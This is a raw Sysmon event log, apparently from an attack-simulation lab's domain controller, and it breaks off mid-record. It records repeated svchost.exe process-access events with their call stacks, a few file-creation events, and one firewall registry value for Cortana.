12:02:15.997{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004789Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.997{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004788Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.997{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.928{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CD3EF9F99138EAC7E9BD4E70A455A0F,SHA256=E687BBECF83FC03F7EB98CB82EB822CE50356212294756EBD4F9DA35C9C35273,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.928{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.928{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.928{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.928{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.928{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.928{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000005330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.912{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742S-1-5-21-4055678433-3894535204-3898404691-500v2.26|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|C=S-1-15-3-1|C=S-1-15-3-2|C=S-1-15-3-3|C=S-1-15-3-4|C=S-1-15-3-6|C=S-1-15-3-8|C=S-1-15-3-9|C=S-1-15-3-787448254-1207972858-3558633622-1059886964|C=S-1-15-3-3215430884-1339816292-89257616-1145831019|C=S-1-15-3-3071617654-1314403908-1117750160-3581451107|C=S-1-15-3-593192589-1214558892-284007604-3553228420|C=S-1-15-3-3870101518-1154309966-1696731070-4111764952|C=S-1-15-3-2105443330-1210154068-4021178019-2481794518|C=S-1-15-3-2345035983-1170044712-735049875-2883010875|C=S-1-15-3-3633849274-1266774400-1199443125-2736873758|C=S-1-15-3-2569730672-1095266119-53537203-1209375796|C=S-1-15-3-2569730672-1095266119-53537203-1209375796|C=S-1-15-3-2452736844-1257488215-2818397580-3305426111|C=S-1-15-3-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|M=microsoft.windows.cortana_cw5n1h2txyewy|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|D=C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\|PFN=Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy| 10341000x80000000000000005329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1